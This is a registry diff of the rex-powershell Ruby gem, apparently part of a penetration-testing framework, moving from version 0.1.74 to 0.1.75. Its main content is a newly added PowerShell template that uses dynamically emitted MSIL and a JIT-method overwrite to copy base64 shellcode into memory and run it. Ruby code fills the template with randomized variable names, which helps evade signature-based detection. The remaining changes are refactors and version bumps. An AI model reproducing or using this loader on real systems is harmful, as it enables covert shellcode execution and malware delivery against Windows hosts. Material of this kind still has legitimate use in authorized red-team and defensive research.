rex-powershell 0.1.74 → 0.1.75

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (12) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data.tar.gz.sig +0 -0
  4. data/data/templates/to_mem_msil.ps1.template +67 -0
  5. data/lib/rex/powershell.rb +3 -3
  6. data/lib/rex/powershell/command.rb +1 -1
  7. data/lib/rex/powershell/payload.rb +42 -9
  8. data/lib/rex/powershell/script.rb +7 -3
  9. data/lib/rex/powershell/templates.rb +6 -0
  10. data/lib/rex/powershell/version.rb +1 -1
  11. metadata +2 -1
  12. metadata.gz.sig +0 -0
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: b88e31ce42aa0f6b8b9849c916f24680f156fb59
4
- data.tar.gz: '0395b6d9bf3e79c7edfaff20e36b049c5df254c7'
3
+ metadata.gz: 8df50450c5b08d320bbe1e4c5c8bf588ec79c379
4
+ data.tar.gz: ac24dc2a5d73c0fa27c8824b154b6988078fbbcf
5
5
  SHA512:
6
- metadata.gz: 5b295b9d04daf9e4b7d39b80ed60ecfd70392c0b45c3337ad39848482f53e5499d30a08f33e9cb72e2a2a6026ca01ce05a1046baa81e0f449e36c9fee0aedec4
7
- data.tar.gz: ae1d2be6edc876b9ec72a408ac466b2e5d73823a34f46c7f46e4033296d4b55730492f315706234d75723cd72107820eaa2b60aa3670825b26d0f41c95f29ded
6
+ metadata.gz: e881e86dc2e6766940499e636bd0465f2b592b4ef3059f005306163c60c553e5a26631775d9263284002f7f35fe6373eb2c3f4a5e3364e019536101af389ced1
7
+ data.tar.gz: 942aa831e1517f61b14928e3c609d9611dc453fee274336a31c8cc65fcba4f0dcb74a56637982e1376152dbad305cc30bd120b1d7df4c4e1952c95141ceb3475
checksums.yaml.gz.sig CHANGED
Binary file
data.tar.gz.sig CHANGED
Binary file
data/data/templates/to_mem_msil.ps1.template ADDED
@@ -0,0 +1,67 @@
1
+ function %{func_build_dyn_type}($%{var_type_name}){
2
+ $%{var_dyn_asm} = ([AppDomain]::CurrentDomain).DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($%{var_type_name})), [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
3
+ $%{var_dyn_asm}.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder((New-Object System.Security.AllowPartiallyTrustedCallersAttribute).GetType().GetConstructors()[0], (New-Object System.Object[](0)))))
4
+ $%{var_dyn_mod} = $%{var_dyn_asm}.DefineDynamicModule($%{var_type_name})
5
+ $%{var_dyn_mod}.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder((New-Object System.Security.UnverifiableCodeAttribute).GetType().GetConstructors()[0], (New-Object System.Object[](0)))))
6
+ return $%{var_dyn_mod}.DefineType($%{var_type_name}, [System.Reflection.TypeAttributes]::Public)
7
+ }
8
+ function %{func_get_meth_addr}($%{var_tgt_meth}){
9
+ $%{var_dyn_type} = %{func_build_dyn_type}('%{str_addr_loc}')
10
+ $%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_tgt_meth}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $(if ([IntPtr]::Size -eq 4) { [UInt32] } else { [Int64] }), $null)).GetILGenerator()
11
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldftn, [System.Reflection.MethodInfo]$%{var_tgt_meth})
12
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
13
+ return (($%{var_dyn_type}.CreateType()).GetMethod('%{str_tgt_meth}')).Invoke($null, @())
14
+ }
15
+
16
+ $%{var_dyn_type} = %{func_build_dyn_type}('%{var_src_meth}')
17
+ $%{var_args} = New-Object System.Type[](3)
18
+ $%{var_args}[0] = [IntPtr]
19
+ $%{var_args}[1] = [IntPtr]
20
+ $%{var_args}[2] = [Int32]
21
+ $%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_src_type}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $null, $%{var_args})).GetILGenerator()
22
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)
23
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_1)
24
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_2)
25
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Volatile)
26
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Cpblk)
27
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
28
+ $%{var_src_meth} = ($%{var_dyn_type}.CreateType()).GetMethod('%{str_src_type}')
29
+
30
+ $%{var_dyn_type} = %{func_build_dyn_type}('%{str_tgt_type}')
31
+ $%{var_args} = New-Object System.Type[](1)
32
+ $%{var_args}[0] = [Int]
33
+ $%{var_dyn_meth} = ($%{var_dyn_type}.DefineMethod('%{str_tgt_meth}', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, [Int], $%{var_args})).GetILGenerator()
34
+ $%{var_xor} = 0x41424344
35
+ $%{var_dyn_meth}.DeclareLocal([Int]) | Out-Null
36
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)
37
+ foreach ($CodeBlock in 1..100) {
38
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $%{var_xor})
39
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Xor)
40
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Stloc_0)
41
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldloc_0)
42
+ $%{var_xor}++
43
+ }
44
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ldc_I4, $%{var_xor})
45
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Xor)
46
+ $%{var_dyn_meth}.Emit([System.Reflection.Emit.OpCodes]::Ret)
47
+ $%{var_tgt_meth} = ($%{var_dyn_type}.CreateType()).GetMethod('%{str_tgt_meth}')
48
+
49
+ foreach ($Exec in 1..20) { $%{var_tgt_meth}.Invoke($null, @(0x11112222)) | Out-Null }
50
+
51
+ if ( [IntPtr]::Size -eq 4 ) {
52
+ $%{var_sc} = [Byte[]] @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)
53
+ } else {
54
+ $%{var_sc} = [Byte[]] @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,0x55,0xE8,0x0D,0x00,0x00,0x00,0x5D,0x41,0x5F,0x41,0x5E,0x41,0x5D,0x41,0x5C,0x48,0x31,0xC0,0xC3)
55
+ }
56
+ $%{var_sc} += [System.Convert]::FromBase64String("%{b64shellcode}")
57
+ $%{var_sc_addr} = [Runtime.InteropServices.Marshal]::AllocHGlobal($%{var_sc}.Length)
58
+ [Runtime.InteropServices.Marshal]::Copy($%{var_sc}, 0, $%{var_sc_addr}, $%{var_sc}.Length)
59
+
60
+ $%{var_args} = New-Object Object[](3)
61
+ $%{var_args}[0] = [IntPtr]$(%{func_get_meth_addr} $%{var_tgt_meth})
62
+ $%{var_args}[1] = $%{var_sc_addr}
63
+ $%{var_args}[2] = $%{var_sc}.Length
64
+
65
+ $%{var_src_meth}.Invoke($null, $%{var_args})
66
+
67
+ $%{var_tgt_meth}.Invoke($null, @(0x11112222))
data/lib/rex/powershell.rb CHANGED
@@ -1,13 +1,13 @@
1
1
  # -*- coding: binary -*-
2
2
  require 'rex/powershell/version'
3
- require 'rex/powershell/templates'
4
- require 'rex/powershell/payload'
5
3
  require 'rex/powershell/output'
6
4
  require 'rex/powershell/parser'
7
5
  require 'rex/powershell/obfu'
8
- require 'rex/powershell/param'
9
6
  require 'rex/powershell/function'
7
+ require 'rex/powershell/param'
10
8
  require 'rex/powershell/script'
9
+ require 'rex/powershell/templates'
10
+ require 'rex/powershell/payload'
11
11
  require 'rex/powershell/psh_methods'
12
12
  require 'rex/powershell/command'
13
13
 
data/lib/rex/powershell/command.rb CHANGED
@@ -297,7 +297,7 @@ EOS
297
297
  when 'old'
298
298
  Rex::Powershell::Payload.to_win32pe_psh(template_path, pay)
299
299
  when 'msil'
300
- fail RuntimeError, 'MSIL Powershell method no longer exists'
300
+ Rex::Powershell::Payload.to_win32pe_psh_msil(template_path, pay)
301
301
  else
302
302
  fail RuntimeError, 'No Powershell method specified'
303
303
  end
data/lib/rex/powershell/payload.rb CHANGED
@@ -5,15 +5,17 @@ module Rex
5
5
  module Powershell
6
6
  module Payload
7
7
 
8
+ include Rex::Powershell::Templates
9
+
8
10
  def self.read_replace_script_template(template_path, filename, hash_sub)
9
- template_pathname = File.join(template_path, filename)
10
11
  template = ''
12
+ template_pathname = File.join(template_path, filename)
11
13
  File.open(template_pathname, "rb") {|f| template = f.read}
12
14
  template % hash_sub
13
15
  end
14
16
 
15
- def self.to_win32pe_psh_net(template_path, code)
16
- rig = Rex::RandomIdentifier::Generator.new()
17
+ def self.to_win32pe_psh_net(template_path = TEMPLATE_DIR, code)
18
+ rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
17
19
  rig.init_var(:var_code)
18
20
  rig.init_var(:var_kernel32)
19
21
  rig.init_var(:var_baseaddr)
@@ -23,6 +25,7 @@ module Payload
23
25
  rig.init_var(:var_compileParams)
24
26
  rig.init_var(:var_syscode)
25
27
  rig.init_var(:var_temp)
28
+ rig.init_var(:var_opf)
26
29
 
27
30
  hash_sub = rig.to_h
28
31
  hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
@@ -30,7 +33,7 @@ module Payload
30
33
  read_replace_script_template(template_path, "to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
31
34
  end
32
35
 
33
- def self.to_win32pe_psh(template_path, code)
36
+ def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
34
37
  hash_sub = {}
35
38
  hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
36
39
  hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -50,9 +53,9 @@ module Payload
50
53
  # Tweaked by shellster
51
54
  # Originally from PowerSploit
52
55
  #
53
- def self.to_win32pe_psh_reflection(template_path, code)
56
+ def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
54
57
  # Intialize rig and value names
55
- rig = Rex::RandomIdentifier::Generator.new()
58
+ rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
56
59
  rig.init_var(:func_get_proc_address)
57
60
  rig.init_var(:func_get_delegate_type)
58
61
  rig.init_var(:var_code)
@@ -64,13 +67,43 @@ module Payload
64
67
  rig.init_var(:var_type_builder)
65
68
  rig.init_var(:var_buffer)
66
69
  rig.init_var(:var_hthread)
70
+ rig.init_var(:var_opf)
71
+
72
+ hash_sub = rig.to_h
73
+ hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
74
+
75
+ read_replace_script_template(template_path, "to_mem_pshreflection.ps1.template",hash_sub).gsub(/(?<!\r)\n/, "\r\n")
76
+ end
77
+
78
+ #
79
+ # MSIL JIT approach as demonstrated by Matt Graeber
80
+ # http://www.exploit-monday.com/2013/04/MSILbasedShellcodeExec.html
81
+ # Referencing PowerShell Empire data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1
82
+ #
83
+ def self.to_win32pe_psh_msil(template_path = TEMPLATE_DIR, code)
84
+ rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
85
+ rig.init_var(:func_build_dyn_type)
86
+ rig.init_var(:func_get_meth_addr)
87
+ rig.init_var(:var_type_name)
88
+ rig.init_var(:var_dyn_asm)
89
+ rig.init_var(:var_dyn_mod)
90
+ rig.init_var(:var_tgt_meth)
91
+ rig.init_var(:var_dyn_type)
92
+ rig.init_var(:var_dyn_meth)
93
+ rig.init_var(:var_args)
94
+ rig.init_var(:var_xor)
95
+ rig.init_var(:var_sc_addr)
96
+ rig.init_var(:var_sc)
97
+ rig.init_var(:var_src_meth)
98
+ rig.init_var(:str_addr_loc)
99
+ rig.init_var(:str_tgt_meth)
100
+ rig.init_var(:str_src_type)
101
+ rig.init_var(:str_tgt_type)
67
102
 
68
103
  hash_sub = rig.to_h
69
104
  hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
70
105
 
71
- read_replace_script_template(template_path,
72
- "to_mem_pshreflection.ps1.template",
73
- hash_sub).gsub(/(?<!\r)\n/, "\r\n")
106
+ read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
74
107
  end
75
108
 
76
109
  end
data/lib/rex/powershell/script.rb CHANGED
@@ -1,6 +1,5 @@
1
1
  # -*- coding: binary -*-
2
2
 
3
-
4
3
  require 'forwardable'
5
4
 
6
5
  module Rex
@@ -12,6 +11,11 @@ module Powershell
12
11
  include Output
13
12
  include Parser
14
13
  include Obfu
14
+ DEFAULT_RIG_OPTS = {
15
+ max_length: 5,
16
+ min_length: 2,
17
+ forbidden: Parser::RESERVED_VARIABLE_NAMES.map {|e| e[1..-1]}
18
+ }
15
19
  # Pretend we are actually a string
16
20
  extend ::Forwardable
17
21
  # In case someone messes with String we delegate based on its instance methods
@@ -31,9 +35,9 @@ module Powershell
31
35
  :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
32
36
  :end_with?
33
37
 
34
- def initialize(code)
38
+ def initialize(code, rig = nil)
35
39
  @code = ''
36
- @rig = Rex::RandomIdentifier::Generator.new
40
+ @rig = rig || Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
37
41
 
38
42
  begin
39
43
  # Open code file for reading
data/lib/rex/powershell/templates.rb CHANGED
@@ -2,6 +2,9 @@ module Rex
2
2
  module Powershell
3
3
  module Templates
4
4
 
5
+ # RandomIdentifier::Generator options
6
+ DEFAULT_RIG_OPTS = Rex::Powershell::Script::DEFAULT_RIG_OPTS
7
+
5
8
  # The base directory that all Powershell script templates live in
6
9
  TEMPLATE_DIR = File.expand_path( File.join( __FILE__ , '..', '..', '..', '..', 'data', 'templates') )
7
10
 
@@ -14,6 +17,9 @@ module Rex
14
17
  # The powershell script template for memory injection using the old method
15
18
  TO_MEM_OLD = File.join(TEMPLATE_DIR, 'to_mem_old.ps1.template')
16
19
 
20
+ # The powershell script template for memory injection using the old method
21
+ TO_MEM_MSIL = File.join(TEMPLATE_DIR, 'to_mem_msil.ps1.template')
22
+
17
23
  end
18
24
  end
19
25
  end
data/lib/rex/powershell/version.rb CHANGED
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.74"
3
+ VERSION = "0.1.75"
4
4
  end
5
5
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-powershell
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.74
4
+ version: 0.1.75
5
5
  platform: ruby
6
6
  authors:
7
7
  - David 'thelightcosine' Maloney
@@ -177,6 +177,7 @@ files:
177
177
  - README.md
178
178
  - Rakefile
179
179
  - data/templates/to_mem_dotnet.ps1.template
180
+ - data/templates/to_mem_msil.ps1.template
180
181
  - data/templates/to_mem_old.ps1.template
181
182
  - data/templates/to_mem_pshreflection.ps1.template
182
183
  - lib/rex/powershell.rb
metadata.gz.sig CHANGED
Binary file